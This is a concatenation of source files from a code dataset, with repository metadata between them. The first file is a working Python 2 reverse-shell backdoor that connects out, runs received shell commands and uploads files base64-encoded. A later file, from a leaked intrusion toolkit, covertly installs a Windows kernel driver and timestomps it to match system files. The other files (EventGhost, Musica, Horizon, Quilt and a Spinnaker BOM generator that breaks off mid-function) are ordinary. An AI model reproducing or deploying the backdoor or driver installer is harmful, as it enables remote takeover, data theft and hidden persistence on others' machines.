| 0.614206
| false
| 3.493917
| false
| false
| false
|
freezeeedos/revshelly
|
python_reverse_shell.py
|
1
|
3523
|
#!/usr/bin/python2
# -*- coding: utf-8 -*-
# Copyright (c) 2013 Quentin Gibert
# All rights reserved.
# Based on the work of:
# David Kennedy: http://www.secmaniac.com/june-2011/creating-a-13-line-backdoor-worry-free-of-av/
# Xavier Garcia: www.shellguardians.com
#Permission is hereby granted, free of charge, to any person obtaining a copy of
#this software and associated documentation files (the "Software"), to deal in
#the Software without restriction, including without limitation the rights to
#use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
#the Software, and to permit persons to whom the Software is furnished to do so,
#subject to the following conditions:
#
#The above copyright notice and this permission notice shall be included in all
#copies or substantial portions of the Software.
#
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
#FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
#COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
#IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
#CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import socket
import subprocess
import sys
import os
import time
import shlex
import base64
import re
HOST = '127.0.0.1' # The remote host
PORT = 8080 # The same port as used by the server
def connect((host, port)):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
return s
def wait_for_command(s):
s.send("[" + os.getcwd() + "]>")
data = s.recv(1024)
data_arr = shlex.split(data, posix=False)
if data == "quit\n":
s.close()
# the socket died
elif len(data)==0:
return True
elif (len(data_arr) > 1) and (data_arr[0] == "uu"):
for i in range(1, len(data_arr)):
try:
f = open(re.sub(r'''"''', '', data_arr[1]), 'rb')
pass
except IOError, e:
s.send("=> " + str(e) + "\n")
continue
try:
fdata = file.read(f)
f.close()
filename = re.sub('''"''', '', os.path.basename(data_arr[i]))
s.send("BEGIN: " + filename + "\n")
s.send(base64.encodestring(fdata))
s.send("END: " + filename + "\n")
except Exception, e:
s.send("Unable to read " + filename + ": " + str(e) + "\n")
return False
elif (len(data_arr) > 1) and (data_arr[0] == "cd"):
try:
os.chdir(re.sub(r'''"''', '', data_arr[1]))
except Exception, cde:
s.send(str(cde) + "\n")
return False
else:
# do shell command
proc = subprocess.Popen(data, shell=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
stdin=subprocess.PIPE)
# read output
stdout_value = proc.stdout.read() + proc.stderr.read()
# send output to attacker
s.send(stdout_value)
return False
def main():
while True:
socked_died=False
try:
s=connect((HOST,PORT))
while not socked_died:
socked_died=wait_for_command(s)
s.close()
except socket.error:
pass
time.sleep(5)
if __name__ == "__main__":
sys.exit(main())
|
mit
| -661,312,054,476,301,800
| 32.552381
| 98
| 0.598354
| false
| 3.658359
| false
| false
| false
|
WoLpH/EventGhost
|
eg/Classes/PluginItem.py
|
1
|
6391
|
# -*- coding: utf-8 -*-
#
# This file is part of EventGhost.
# Copyright © 2005-2016 EventGhost Project <http://www.eventghost.net/>
#
# EventGhost is free software: you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free
# Software Foundation, either version 2 of the License, or (at your option)
# any later version.
#
# EventGhost is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
# more details.
#
# You should have received a copy of the GNU General Public License along
# with EventGhost. If not, see <http://www.gnu.org/licenses/>.
import base64
import pickle
import wx
# Local imports
import eg
from ActionItem import ActionItem
from TreeItem import TreeItem
class PluginItem(ActionItem):
xmlTag = "Plugin"
icon = eg.Icons.PLUGIN_ICON
isRenameable = False
info = None
@eg.AssertInActionThread
def __init__(self, parent, node):
TreeItem.__init__(self, parent, node)
if node.text:
try:
args = pickle.loads(base64.b64decode(node.text))
except AttributeError:
args = ()
else:
args = ()
evalName = node.attrib.get('identifier', None)
self.pluginName = node.attrib.get('file', None)
guid = node.attrib.get('guid', self.pluginName)
self.info = info = eg.pluginManager.OpenPlugin(
guid,
evalName,
args,
self,
)
self.name = eg.text.General.pluginLabel % info.label
if info.icon != self.icon:
self.icon = eg.Icons.PluginSubIcon(info.icon)
#self.icon = info.icon
self.url = info.url
self.executable = info.instance
def AskCut(self):
return self.AskDelete()
def AskDelete(self):
actionItemCls = self.document.ActionItem
def SearchFunc(obj):
if obj.__class__ == actionItemCls:
if obj.executable and obj.executable.plugin == self.executable:
return True
return None
if self.root.Traverse(SearchFunc) is not None:
eg.MessageBox(
eg.text.General.deletePlugin,
eg.APP_NAME,
wx.NO_DEFAULT | wx.OK | wx.ICON_EXCLAMATION
)
return False
if not TreeItem.AskDelete(self):
return False
return True
@eg.AssertInActionThread
def Delete(self):
info = self.info
def DoIt():
info.Close()
info.instance.OnDelete()
info.RemovePluginInstance()
eg.actionThread.Call(DoIt)
ActionItem.Delete(self)
self.executable = None
self.info = None
@eg.AssertInActionThread
def Execute(self):
if not self.isEnabled:
return None, None
if eg.config.logActions:
self.Print(self.name)
if self.shouldSelectOnExecute:
wx.CallAfter(self.Select)
eg.indent += 1
self.info.Start()
eg.indent -= 1
eg.result = self.executable
return None, None
# The Find function calls this from MainThread, so we can't restrict this
# to the ActionThread
#@eg.AssertInActionThread
def GetArguments(self):
return self.info.args
def GetBasePath(self):
"""
Returns the filesystem path, where additional files (like pictures)
should be found.
Overrides ActionItem.GetBasePath()
"""
return self.info.path
def GetData(self):
attr, text = TreeItem.GetData(self)
del attr[0]
attr.append(('Identifier', self.executable.info.evalName))
guid = self.executable.info.guid
if guid:
attr.append(('Guid', guid))
attr.append(('File', self.pluginName))
text = base64.b64encode(pickle.dumps(self.info.args, 2))
return attr, text
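# Round-trip note: GetData() stores the plugin arguments as
# base64.b64encode(pickle.dumps(args, 2)), and __init__() above recovers them
# with pickle.loads(base64.b64decode(node.text)), so the XML text node carries
# the pickled constructor arguments.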
def GetLabel(self):
return self.name
def GetTypeName(self):
return self.executable.info.name
def NeedsStartupConfiguration(self):
"""
Returns True if the item wants to be configured after creation.
Overrides ActionItem.NeedsStartupConfiguration()
"""
# if the Configure method of the executable is overridden, we assume
# the item wants to be configured after creation
return (
self.executable.Configure.im_func !=
eg.PluginBase.Configure.im_func
)
def RefreshAllVisibleActions(self):
"""
Calls Refresh() for all currently visible actions of this plugin.
"""
actionItemCls = self.document.ActionItem
plugin = self.info.instance
def Traverse(item):
if item.__class__ == actionItemCls:
if item.executable.plugin == plugin:
pass
#eg.Notify("NodeChanged", item)
else:
if item.childs and item in item.document.expandedNodes:
for child in item.childs:
Traverse(child)
Traverse(self.root)
@eg.LogIt
def RestoreState(self):
if self.isEnabled:
eg.actionThread.Call(self.info.Start)
@eg.LogIt
@eg.AssertInActionThread
def SetArguments(self, args):
info = self.info
if not info.lastException and args == self.info.args:
return
self.info.args = args
label = info.instance.GetLabel(*args)
if label != info.label:
info.label = label
self.name = eg.text.General.pluginLabel % label
#eg.Notify("NodeChanged", self)
self.RefreshAllVisibleActions()
if self.isEnabled:
eg.actionThread.Call(self.info.Stop)
eg.actionThread.Call(self.info.Start)
def SetAttributes(self, tree, itemId):
if self.info.lastException or self.info.initFailed:
tree.SetItemTextColour(itemId, eg.colour.pluginError)
@eg.AssertInActionThread
def SetEnable(self, flag=True):
ActionItem.SetEnable(self, flag)
if flag:
self.info.Start()
else:
self.info.Stop()
|
gpl-2.0
| -8,394,167,896,932,475,000
| 30.019417
| 79
| 0.6
| false
| 4.190164
| true
| false
| false
|
FabriceSalvaire/Musica
|
Musica/Geometry/Path.py
|
1
|
2215
|
####################################################################################################
#
# Musica - A Music Theory Package for Python
# Copyright (C) 2017 Fabrice Salvaire
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
####################################################################################################
####################################################################################################
from .Primitive import Primitive2D
from .Vector import Vector2D
####################################################################################################
class Polyline(Primitive2D):
#######################################
def __init__(self, *args):
""" Construct a :class:`Polyline` along points. """
if len(args) == 1:
self._points = [Vector2D(point) for point in args[0]]
else:
self._points = [Vector2D(point) for point in args]
##############################################
def clone(self):
return self.__class__(self._points)
##############################################
def __repr__(self):
return "{0.__class__.__name__} {0._points}".format(self)
##############################################
def transform(self, transformation):
points = transformation * self._points
return self.__class__(points)
##############################################
def __iter__(self):
return iter(self._points)
def __len__(self):
return len(self._points)
def __getitem__(self, _slice):
return self._points[_slice]
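# Usage sketch: each argument is passed through Vector2D(), so plain coordinate
# pairs are assumed to be acceptable input here; 'transformation' below stands
# for any object implementing the '*' operator used by transform():
#
#     polyline = Polyline((0, 0), (1, 0), (1, 1))
#     len(polyline) # 3
#     moved = polyline.transform(transformation)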
|
gpl-3.0
| 6,031,306,140,311,497,000
| 31.101449
| 100
| 0.463657
| false
| 5.139211
| false
| false
| false
|
ikargis/horizon_fod
|
horizon/decorators.py
|
1
|
3388
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Copyright 2012 CRS4
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
General-purpose decorators for use with Horizon.
"""
import functools
from django.utils.decorators import available_attrs # noqa
from django.utils.translation import ugettext_lazy as _ # noqa
def _current_component(view_func, dashboard=None, panel=None):
"""Sets the currently-active dashboard and/or panel on the request."""
@functools.wraps(view_func, assigned=available_attrs(view_func))
def dec(request, *args, **kwargs):
if dashboard:
request.horizon['dashboard'] = dashboard
if panel:
request.horizon['panel'] = panel
return view_func(request, *args, **kwargs)
return dec
def require_auth(view_func):
"""Performs user authentication check.
Similar to Django's `login_required` decorator, except that this throws
:exc:`~horizon.exceptions.NotAuthenticated` exception if the user is not
signed-in.
"""
from horizon.exceptions import NotAuthenticated # noqa
@functools.wraps(view_func, assigned=available_attrs(view_func))
def dec(request, *args, **kwargs):
if request.user.is_authenticated():
return view_func(request, *args, **kwargs)
raise NotAuthenticated(_("Please log in to continue."))
return dec
def require_perms(view_func, required):
"""Enforces permission-based access controls.
:param list required: A list of permission names, all of which the request
user must possess in order to access the decorated view.
Example usage::
from horizon.decorators import require_perms
@require_perms(['foo.admin', 'foo.member'])
def my_view(request):
...
Raises a :exc:`~horizon.exceptions.NotAuthorized` exception if the
requirements are not met.
"""
from horizon.exceptions import NotAuthorized # noqa
# We only need to check each permission once for a view, so we'll use a set
current_perms = getattr(view_func, '_required_perms', set([]))
view_func._required_perms = current_perms | set(required)
@functools.wraps(view_func, assigned=available_attrs(view_func))
def dec(request, *args, **kwargs):
if request.user.is_authenticated():
if request.user.has_perms(view_func._required_perms):
return view_func(request, *args, **kwargs)
raise NotAuthorized(_("You are not authorized to access %s")
% request.path)
# If we don't have any permissions, just return the original view.
if required:
return dec
else:
return view_func
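# Usage sketch: both helpers take the view function as their first argument, so
# they can be applied by wrapping an existing view directly ('my_view' below is
# a hypothetical Django view function):
#
#     def my_view(request):
#         ...
#
#     my_view = require_auth(my_view)
#     my_view = require_perms(my_view, ['foo.admin', 'foo.member'])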
|
apache-2.0
| -4,795,479,006,821,248,000
| 35.042553
| 79
| 0.679752
| false
| 4.21393
| false
| false
| false
|
quiltdata/quilt
|
api/python/quilt3/registry.py
|
1
|
1604
|
"""
Microservice that provides temporary user credentials to the catalog
"""
from datetime import timedelta
import boto3
import requests
from botocore.exceptions import ClientError
from flask import Flask
from flask_cors import CORS
from flask_json import as_json
app = Flask(__name__) # pylint: disable=invalid-name
app.config['JSON_USE_ENCODE_METHODS'] = True
app.config['JSON_ADD_STATUS'] = False
sts_client = boto3.client( # pylint: disable=invalid-name
'sts',
)
class ApiException(Exception):
"""
Base class for API exceptions.
"""
def __init__(self, status_code, message):
super().__init__()
self.status_code = status_code
self.message = message
CORS(app, resources={"/api/*": {"origins": "*", "max_age": timedelta(days=1)}})
@app.route('/api/buckets', methods=['GET'])
@as_json
def list_buckets():
"""
Returns an empty list for compatibility
"""
return dict(
buckets=[]
)
@app.route('/api/auth/get_credentials', methods=['GET'])
@as_json
def get_credentials():
"""
Obtains credentials corresponding to your role.
Returns a JSON object with the STS credentials, including:
AccessKeyId(string): access key ID
SecretAccessKey(string): secret access key
SessionToken(string): session token
"""
try:
creds = sts_client.get_session_token()
except ClientError as ex:
print(ex)
raise ApiException(requests.codes.server_error,
"Failed to get credentials for your AWS Account.")
return creds['Credentials']
if __name__ == '__main__':
app.run()
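# Client-side sketch: with this service running locally (app.run() above uses
# Flask's default port 5000), the credentials endpoint can be exercised from
# another process roughly like this (illustrative, not executed here):
#
#     import requests
#     resp = requests.get('http://127.0.0.1:5000/api/auth/get_credentials')
#     creds = resp.json() # temporary STS credentials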
|
apache-2.0
| -7,490,552,160,810,158,000
| 22.588235
| 79
| 0.642768
| false
| 3.912195
| false
| false
| false
|
DarthMaulware/EquationGroupLeaks
|
Leak #5 - Lost In Translation/windows/Resources/Dsz/PyScripts/Lib/dsz/windows/driver/__init__.py
|
1
|
11721
|
# uncompyle6 version 2.9.10
# Python bytecode 2.7 (62211)
# Decompiled from: Python 3.6.0b2 (default, Oct 11 2016, 05:27:10)
# [GCC 6.2.0 20161005]
# Embedded file name: __init__.py
import dsz
import dsz.file
import dsz.path
import dsz.version
def Install(project, driverName, localDriverName, startValue, typeValue, ask=True):
x = dsz.control.Method()
dsz.control.echo.Off()
dsz.control.wow64.Disable()
if _isDriverSigningEnabled():
dsz.ui.Echo('* Cannot install because driver signing is enabled', dsz.ERROR)
return False
if len(driverName) == 0:
dsz.ui.Echo('* Invalid driver name given', dsz.ERROR)
return False
if ask and not dsz.ui.Prompt('Do you want to install the %s driver (%s.sys)?' % (project, driverName)):
return False
try:
systemroot = dsz.path.windows.GetSystemPath()
except:
dsz.ui.Echo('* Unable to determine system root', dsz.ERROR)
return False
if dsz.cmd.Run('registryquery -hive L -key SYSTEM\\CurrentControlSet\\Services\\%s' % driverName):
dsz.ui.Echo('%s (%s.sys) is already installed (key exists)' % (project, driverName), dsz.ERROR)
return False
if dsz.file.Exists('%s.sys' % driverName, '%s\\drivers' % systemroot):
dsz.ui.Echo('%s (%s.sys) is already installed (file exists)' % (project, driverName), dsz.ERROR)
return False
dsz.ui.Echo('Uploading the SYS')
if dsz.cmd.Run('put "%s" -name "%s\\drivers\\%s.sys" -permanent -project %s' % (localDriverName, systemroot, driverName, project)):
dsz.ui.Echo(' SUCCESS', dsz.GOOD)
else:
dsz.ui.Echo(' FAILED', dsz.ERROR)
return False
dsz.ui.Echo('Matching file time for %s.sys' % driverName)
if dsz.version.checks.IsOs64Bit():
matchFile = '%s\\winlogon.exe' % systemroot
else:
matchFile = '%s\\user.exe' % systemroot
if dsz.cmd.Run('matchfiletimes -src "%s" -dst "%s\\drivers\\%s.sys"' % (matchFile, systemroot, driverName)):
dsz.ui.Echo(' SUCCESS', dsz.GOOD)
else:
dsz.ui.Echo(' FAILED (but continuing anyway)', dsz.WARNING)
keysAdded = True
dsz.ui.Echo('Adding registry keys')
if not dsz.cmd.Run('registryadd -hive L -key SYSTEM\\CurrentControlSet\\Services\\%s' % driverName):
keysAdded = False
elif not dsz.cmd.Run('registryadd -hive L -key SYSTEM\\CurrentControlSet\\Services\\%s -value ErrorControl -type REG_DWORD -data 0' % driverName):
keysAdded = False
elif not dsz.cmd.Run('registryadd -hive L -key SYSTEM\\CurrentControlSet\\Services\\%s -value Start -type REG_DWORD -data %u' % (driverName, startValue)):
keysAdded = False
elif not dsz.cmd.Run('registryadd -hive L -key SYSTEM\\CurrentControlSet\\Services\\%s -value Type -type REG_DWORD -data %u' % (driverName, typeValue)):
keysAdded = False
if keysAdded:
dsz.ui.Echo(' SUCCESS', dsz.GOOD)
else:
dsz.ui.Echo(' FAILED', dsz.ERROR)
return False
return True
def Load(driverName):
x = dsz.control.Method()
dsz.control.echo.Off()
if len(driverName) == 0:
dsz.ui.Echo('* Invalid driver name given', dsz.ERROR)
return False
else:
dsz.ui.Echo('Loading %s' % driverName)
if dsz.cmd.Run('drivers -load %s' % driverName):
dsz.ui.Echo(' SUCCESS', dsz.GOOD)
return True
dsz.ui.Echo(' FAILED', dsz.ERROR)
return False
def Uninstall(project, driverName, ask=True):
x = dsz.control.Method()
dsz.control.echo.Off()
dsz.control.wow64.Disable()
rtn = True
if len(driverName) == 0:
dsz.ui.Echo('Invalid driver name given', dsz.ERROR)
return False
if ask and not dsz.ui.Prompt('Do you want to uninstall the %s driver (%s.sys)?' % (project, driverName)):
return False
try:
systemroot = dsz.path.windows.GetSystemPath()
except:
dsz.ui.Echo('* Unable to determine system root', dsz.ERROR)
return False
if not Unload(driverName):
rtn = False
dsz.ui.Echo('Removing registry key')
if dsz.cmd.Run('registrydelete -hive L -key SYSTEM\\CurrentControlSet\\Services\\%s -recursive' % driverName):
dsz.ui.Echo(' SUCCESS', dsz.GOOD)
else:
dsz.ui.Echo(' FAILED', dsz.ERROR)
rtn = False
dsz.ui.Echo('Removing %s.sys' % driverName)
if dsz.cmd.Run('delete -file "%s\\drivers\\%s.sys"' % (systemroot, driverName)):
dsz.ui.Echo(' SUCCESS', dsz.GOOD)
else:
dsz.ui.Echo(' FAILED', dsz.ERROR)
rtn = False
return rtn
def Unload(driverName):
x = dsz.control.Method()
dsz.control.echo.Off()
if len(driverName) == 0:
dsz.ui.Echo('* Invalid driver name given', dsz.ERROR)
return False
else:
dsz.ui.Echo('Unloading %s' % driverName)
if dsz.cmd.Run('drivers -unload %s' % driverName):
dsz.ui.Echo(' SUCCESS', dsz.GOOD)
return True
dsz.ui.Echo(' FAILED', dsz.ERROR)
return False
def VerifyInstall(driverName, startValue, typeValue):
x = dsz.control.Method()
dsz.control.echo.Off()
dsz.control.wow64.Disable()
if len(driverName) == 0:
dsz.ui.Echo('* Invalid driver name given', dsz.ERROR)
return False
try:
systemroot = dsz.path.windows.GetSystemPath()
except:
dsz.ui.Echo('* Unable to determine system root', dsz.ERROR)
return False
rtn = True
dsz.ui.Echo('Checking for %s.sys' % driverName)
if dsz.file.Exists('%s.sys' % driverName, '%s\\drivers' % systemroot):
dsz.ui.Echo(' SUCCESS', dsz.GOOD)
else:
dsz.ui.Echo(' FAILED', dsz.ERROR)
rtn = False
keyLoc = 'SYSTEM\\CurrentControlSet\\Services\\%s' % driverName
dsz.ui.Echo('Checking for key')
if dsz.cmd.Run('registryquery -hive L -key %s' % keyLoc):
dsz.ui.Echo(' SUCCESS', dsz.GOOD)
else:
dsz.ui.Echo(' FAILED', dsz.ERROR)
rtn = False
dsz.ui.Echo('Checking for key/ErrorControl')
if dsz.cmd.Run('registryquery -hive L -key %s -value ErrorControl' % keyLoc, dsz.RUN_FLAG_RECORD):
valueGood = False
try:
type = dsz.cmd.data.Get('Key::Value::Type', dsz.TYPE_STRING)
if type[0] == 'REG_DWORD':
data = dsz.cmd.data.Get('Key::Value::Value', dsz.TYPE_STRING)
if len(data[0]) > 0 and int(data[0]) == 0:
valueGood = True
except:
pass
if valueGood:
dsz.ui.Echo(' SUCCESS', dsz.GOOD)
else:
dsz.ui.Echo(' FAILED (value is bad)', dsz.ERROR)
rtn = False
else:
dsz.ui.Echo(' FAILED (value not found)', dsz.ERROR)
rtn = False
dsz.ui.Echo('Checking for key/Start')
if dsz.cmd.Run('registryquery -hive L -key %s -value Start' % keyLoc, dsz.RUN_FLAG_RECORD):
valueGood = False
try:
type = dsz.cmd.data.Get('Key::Value::Type', dsz.TYPE_STRING)
if type[0] == 'REG_DWORD':
data = dsz.cmd.data.Get('Key::Value::Value', dsz.TYPE_STRING)
if len(data[0]) > 0 and int(data[0]) == startValue:
valueGood = True
except:
pass
if valueGood:
dsz.ui.Echo(' SUCCESS', dsz.GOOD)
else:
dsz.ui.Echo(' FAILED (value is bad)', dsz.ERROR)
rtn = False
else:
dsz.ui.Echo(' FAILED (value not found)', dsz.ERROR)
rtn = False
dsz.ui.Echo('Checking for key/Type')
if dsz.cmd.Run('registryquery -hive L -key %s -value Type' % keyLoc, dsz.RUN_FLAG_RECORD):
valueGood = False
try:
type = dsz.cmd.data.Get('Key::Value::Type', dsz.TYPE_STRING)
if type[0] == 'REG_DWORD':
data = dsz.cmd.data.Get('Key::Value::Value', dsz.TYPE_STRING)
if len(data[0]) > 0 and int(data[0]) == typeValue:
valueGood = True
except:
pass
if valueGood:
dsz.ui.Echo(' SUCCESS', dsz.GOOD)
else:
dsz.ui.Echo(' FAILED (value is bad)', dsz.ERROR)
rtn = False
else:
dsz.ui.Echo(' FAILED (value not found)', dsz.ERROR)
rtn = False
return rtn
def VerifyRunning(driverName):
x = dsz.control.Method()
dsz.control.echo.Off()
dsz.control.wow64.Disable()
if len(driverName) == 0:
dsz.ui.Echo('* Invalid driver name given', dsz.ERROR)
return False
dsz.ui.Echo('Getting driver list')
if dsz.cmd.Run('drivers -list -minimal', dsz.RUN_FLAG_RECORD):
dsz.ui.Echo(' SUCCESS', dsz.GOOD)
else:
dsz.ui.Echo(' FAILED (query of running drivers failed)', dsz.ERROR)
return False
try:
drivers = dsz.cmd.data.Get('DriverItem', dsz.TYPE_OBJECT)
except:
dsz.ui.Echo(' FAILED (failed to get driver list data)', dsz.ERROR)
return False
lowerDriverName = driverName.lower()
fullLowerDriverName = '%s.sys' % driverName.lower()
dsz.ui.Echo('Checking for %s' % driverName)
for driverObj in drivers:
try:
name = dsz.cmd.data.ObjectGet(driverObj, 'Name', dsz.TYPE_STRING)
namePieces = dsz.path.Split(name[0])
if namePieces[1].lower() == lowerDriverName or namePieces[1].lower() == fullLowerDriverName:
dsz.ui.Echo(' SUCCESS', dsz.GOOD)
return True
except:
pass
dsz.ui.Echo(' FAILED (driver not running)', dsz.ERROR)
return False
def UpgradeDriver(project, drvName, ask=True):
x = dsz.control.Method()
dsz.control.echo.Off()
systemRoot = dsz.path.windows.GetSystemPath()
tmpName = '%s32.sys' % drvName
dsz.ui.Echo('Move existing driver')
if not dsz.cmd.Run('move "%s\\drivers\\%s.sys" "%s\\drivers\\%s"' % (systemRoot, drvName, systemRoot, tmpName)):
dsz.ui.Echo(' FAILED', dsz.ERROR)
return False
dsz.ui.Echo(' MOVED', dsz.GOOD)
dsz.ui.Echo('Uploading the SYS file')
if not dsz.cmd.Run('put "%s.sys" -name "%s\\drivers\\%s.sys" -permanent -project %s' % (drvName, systemRoot, drvName, project)):
dsz.ui.Echo(' FAILED', dsz.ERROR)
dsz.cmd.Run('move "%s\\drivers\\%s.sys" "%s\\drivers\\%s"' % (systemRoot, tmpName, systemRoot, drvName))
return False
dsz.ui.Echo(' SUCCESS', dsz.GOOD)
if dsz.version.checks.IsOs64Bit():
matchFile = '%s\\winlogon.exe' % systemRoot
else:
matchFile = '%s\\user.exe' % systemRoot
dsz.ui.Echo('Matching file times for %s.sys with %s' % (drvName, matchFile))
if dsz.cmd.Run('matchfiletimes -src "%s" -dst "%s\\drivers\\%s.sys"' % (matchFile, systemRoot, drvName)):
dsz.ui.Echo(' MATCHED', dsz.GOOD)
else:
dsz.ui.Echo(' FAILED', dsz.WARNING)
dsz.ui.Echo('Matching file times for %s with %s' % (tmpName, matchFile))
if dsz.cmd.Run('matchfiletimes -src "%s" -dst "%s\\drivers\\%s"' % (matchFile, systemRoot, tmpName)):
dsz.ui.Echo(' MATCHED', dsz.GOOD)
else:
dsz.ui.Echo(' FAILED', dsz.WARNING)
dsz.ui.Echo('Deleting existing driver')
if dsz.cmd.Run('delete -file "%s\\drivers\\%s" -afterreboot' % (systemRoot, tmpName)):
dsz.ui.Echo(' MOVED', dsz.GOOD)
else:
dsz.ui.Echo(' FAILED', dsz.ERROR)
dsz.ui.Echo('Upgrade complete (reboot required)')
return True
def _isDriverSigningEnabled():
if dsz.version.checks.windows.IsVistaOrGreater():
if dsz.version.checks.IsOs64Bit():
return True
return False
|
unlicense
| 6,155,391,410,086,799,000
| 38.073333
| 158
| 0.594233
| false
| 3.225371
| false
| false
| false
|
Roshan2017/spinnaker
|
dev/generate_bom.py
|
1
|
12830
|
#!/usr/bin/python
#
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import datetime
import os
import socket
import sys
import yaml
from annotate_source import Annotator
from spinnaker.run import run_quick
SERVICES = 'services'
VERSION = 'version'
GOOGLE_CONTAINER_BUILDER_SERVICE_BASE_CONFIG = {
'steps': [
{
'name': 'java:8',
'env': ['GRADLE_USER_HOME=cache'],
'args': []
},
{
'name': 'gcr.io/cloud-builders/docker',
'args': []
}
],
'images': [],
'timeout': '3600s'
}
GOOGLE_CONTAINER_BUILDER_MONITORING_BASE_CONFIG = {
'steps': [
{
'name': 'gcr.io/cloud-builders/docker',
'dir': 'spinnaker-monitoring-daemon',
'args': []
}
],
'images': [],
'timeout': '3600s'
}
class BomGenerator(Annotator):
"""Provides facilities for generating the Bill of Materials file for the
Spinnaker product release.
This assumes Halyard (https://github.com/spinnaker/halyard) is installed on
the machine this script runs on.
"""
COMPONENTS = [
'clouddriver',
'deck',
'echo',
'front50',
'gate',
'igor',
'orca',
'rosco',
'fiat',
'spinnaker-monitoring',
'spinnaker'
]
def __init__(self, options):
self.__base_dir = options.base_dir
self.__docker_registry = options.docker_registry
self.__bom_file = ''
self.__component_versions = {}
self.__changelog_start_hashes = {} # Hashes to start from when generating changelogs.
self.__toplevel_version = ''
self.__changelog_output = options.changelog_output
self.__alias = options.bom_alias
super(BomGenerator, self).__init__(options)
@classmethod
def init_argument_parser(cls, parser):
"""Initialize command-line arguments."""
parser.add_argument('--base_dir', default='.', required=True,
help="Base directory containing the component's git repositories as subdirectories.")
parser.add_argument('--container_builder', default='gcb',
help="Type of builder to use. Currently, the supported options are {'gcb', 'docker'}.")
parser.add_argument('--docker_registry', default='',
help="Docker registry to push the container images to.")
parser.add_argument('--changelog_output', default='',
help="Output file to write the changelog to.")
parser.add_argument('--bom_alias', default='',
help="Alias to rename the 'real' BOM as. This also sets the Spinnaker version as the alias.")
super(BomGenerator, cls).init_argument_parser(parser)
def __version_from_tag(self, comp):
"""Determine the component version from the 'version-X.Y.Z' git tag.
Args:
comp [string]: Spinnaker component name.
Returns:
[string] Component version with build number and without 'version-'.
"""
version_bump = self.__component_versions[comp]
next_tag_with_build = '{0}-{1}'.format(version_bump.version_str,
self.build_number)
first_dash_idx = next_tag_with_build.index('-')
return next_tag_with_build[first_dash_idx + 1:]
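# Worked example (sketch): if version_bump.version_str is 'version-1.2.3' and
# the build number is '17', next_tag_with_build becomes 'version-1.2.3-17' and
# the value returned for the component is '1.2.3-17'.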
def write_container_builder_gcr_config(self):
"""Write a configuration file for producing Container Images with Google Container Builder for each microservice.
"""
for comp in self.__component_versions:
if comp == 'spinnaker-monitoring':
config = dict(GOOGLE_CONTAINER_BUILDER_MONITORING_BASE_CONFIG)
version = self.__version_from_tag(comp)
versioned_image = '{reg}/monitoring-daemon:{tag}'.format(reg=self.__docker_registry,
tag=version)
config['steps'][0]['args'] = ['build', '-t', versioned_image, '-f', 'Dockerfile', '.']
config['images'] = [versioned_image]
config_file = '{0}-gcb.yml'.format(comp)
with open(config_file, 'w') as cfg:
yaml.dump(config, cfg, default_flow_style=True)
elif comp == 'spinnaker':
pass
else:
config = dict(GOOGLE_CONTAINER_BUILDER_SERVICE_BASE_CONFIG)
gradle_version = self.__version_from_tag(comp)
gradle_cmd = ''
if comp == 'deck':
gradle_cmd = './gradlew build -PskipTests'
else:
gradle_cmd = './gradlew {0}-web:installDist -x test'.format(comp)
config['steps'][0]['args'] = ['bash', '-c', gradle_cmd]
versioned_image = '{reg}/{repo}:{tag}'.format(reg=self.__docker_registry,
repo=comp,
tag=gradle_version)
config['steps'][1]['args'] = ['build', '-t', versioned_image, '-f', 'Dockerfile.slim', '.']
config['images'] = [versioned_image]
config_file = '{0}-gcb.yml'.format(comp)
with open(config_file, 'w') as cfg:
yaml.dump(config, cfg, default_flow_style=True)
def write_docker_version_files(self):
"""Write a file containing the full tag for each microservice for Docker.
"""
for comp in self.__component_versions:
if comp == 'spinnaker':
continue  # the top-level 'spinnaker' entry has no Docker image of its own
gradle_version = self.__version_from_tag(comp)
docker_tag = '{reg}/{comp}:{tag}'.format(reg=self.__docker_registry,
comp=comp,
tag=gradle_version)
config_file = '{0}-docker.yml'.format(comp)
with open(config_file, 'w') as cfg:
cfg.write(docker_tag)
def generate_changelog(self):
"""Generate a release changelog and write it to a file.
The changelog contains a section per microservice that describes the
changes made since the last Spinnaker release. It also contains the
version information.
"""
